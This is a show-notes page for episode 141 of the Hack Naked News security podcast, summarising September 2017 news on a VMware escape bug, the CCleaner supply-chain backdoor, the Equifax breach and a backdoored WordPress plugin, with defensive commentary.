HNNEpisode141

From Paul's Security Weekly
Jump to: navigation, search

Hack Naked News #141

Recorded September 18, 2017 at G-Unit Studios in Rhode Island!

Episode Audio

Hosts

  • Paul Asadoorian
    Embedded device security researcher, security podcaster, and CEO of Active Countermeasures .
  • Jason Wood
    Security consultant, penetration tester, sysadmin, and Founder of Paladin Security.
  • News

    1. VMware Patches Bug That Allows Guest to Execute Code on Host - Last Friday VMware reported an "escape" vulnerability in its product line as discovered by independent security researchers. The vulnerability that allows an attacker to jump from guest to host affects Windows version 6.5 of vCenter Server and version 6.5 of ESXi but not versions 6.0 and 5.5. It also affects version 12.x of Workstation and version 8.x of Fusion. Patches have been made available, so get patching!
    2. Warning: CCleaner Hacked to Distribute Malware; Over 2.3 Million Users Infected - The Hacker News reported that CCleaner has been backdoored in a supply chain attack, quoting: If you have downloaded or updated CCleaner application on your computer between August 15 and September 12 of this year from its official website, then pay attention—your computer has been compromised. CCleaner is a popular application with over 2 billion downloads, created by Piriform and recently acquired by Avast, that allows users to clean up their system to optimize and enhance performance. Cisco's Talos team dicovered that the Avast servers hosting this software, acquired by acquisition of PiriForm, were compromised and the real software replaced by an attacker's own version. Over 2 million people downloaded the tainted version and must re-install the clean version of the software (presumably after removing the backdoored version). In cases like this, a complete re-install is what I would do, or a restore from a clean backup.
    3. Chrome To Label FTP Sites Insecure - Most major distributions, Debian and kernel.org included, have stopped offering FTP access to software. Chrome's team has also decided to stop supporting it in the browser, for any remaining projects or sites still using the ancient FTP protocol. While HTTPS is not perfect, it does offer significant advantages over FTP for security, so this is a good move in my opinion.
    4. Equifax Replaces Key Staff Members Post Breach- An announcement was made by Equifax that it is replacing the CSO and CIO roles in the company, following one of the largest breaches: Susan Mauldin, chief security officer, retired and was replaced by Russ Ayres in an interim role, while chief information officer David Webb left and was replaced by Mark Rohrwasser in an interim capacity, the firm said. Folks, don't read too much into this, likely this is just a PR move. We don't have a full picture of what happened, and rather than blaming individuals, I lean more towards blaming the entire organization and the (lack of) security culture present in the organization that likely led to a breach of this magnitude.
    5. Rogue WordPress Plugin Allowed Spam Injection - Threatpost has reported: A popular WordPress plugin called Display Widgets running on 200,000 sites was removed from the official WordPress.org plugin repository after researchers discovered the plugin had a backdoor that was injecting spam ads into victims’ sites. According to researchers at Wordfence who publicly disclosed the rogue plugin on Tuesday, the backdoor had been present in Display Widgets version 2.6.1 and version 2.6.3 for approximately three months. According to researchers, the plugin had been removed four times from the WordPress.org repository for similar offenses since June. Its very clear there is a lack of process, still, at Wordpress for vetting Wordpress plugins. I would love to see a human and automated approach to discovering bugs in plugins....
    6. Equifax confirms up to 400,000 UK consumers at risk after data breach - Hey, welcoem to the club! A statement posted on Equifax’s UK website (which previously has made no mention of the hack which was first discovered by the company in July) confirmed that around 400,000 UK citizens have been affected by the data breach.
    7. Quantum Computing Poses Risks to Cryptography and Bitcoin - I supposed the threat of cracking Bitcoin is a concern, however equally or even more concerning is the potential ability of Quantom computing to crack PKI, although I think we are a ways away from that. If you're curious: Quantum Computing is very different from current forms of silicon based computing. The allure of quantum computing is that it can make use of quantum states of matter, including subatomic particle entanglement and superposition, to achieve massive computer processing power


    Expert Commentary with Jason Wood, Paladin Security

    Why Display Widgets Went Malicious

    https://www.wordfence.com/blog/2017/09/man-behind-plugin-spam-mason-soiza/

    Wordpress is one of the most popular blogging platforms out there for both bloggers and attackers. It’s one of those apps that almost everyone uses (including me), but you have to keep patched religiously because it is ALWAYS under attack. Plugins that haven’t been updated are a prime point of attack. Last week Wordfence (who makes a defensive plugin) released a blog post about a popular Wordpress plugin named Display Widgets coming backdoored from Wordpress.org.

    Display Widgets allows Wordpress users to put custom content in preset locations on their sites. Its been around a while, but this summer it was suddenly began downloading additional code from the owner’s server. It was subsequently removed from Wordpress’s repository and re-added three times as the author made modifications to the plugin to “fix” the issue while moving the malicious code around.

    Wordfence did some digging on what happened with Display Widgets Wordpress plugin. It is kind of an interesting way to spread malicious code. Buy a popular plugin and then have it pump out spam, download code to the server, etc. The original author of the plugin sold it to “Mason Soiza” on June 21, 2017 for $15,000. The malicious code was immediately added as a new release and was discovered two days later by another plugin developer. Wordfence’s post includes information from the original author of the plugin, including emails from when Mason made the offer to buy the plugin. I’d recommend checking it out.

    So what’s the point of all this? Mainly that getting your Wordpress plugins from a trusted source like Wordpress’ repository may not always be safe. File integrity monitoring of your Wordpress install is highly recommended. Apparently it’s worth $15,000 to attackers to buy a popular plugin, ride their reputation to spread spam and backdoor web servers. Don’t depend on Wordpress to validate the security of your plugins.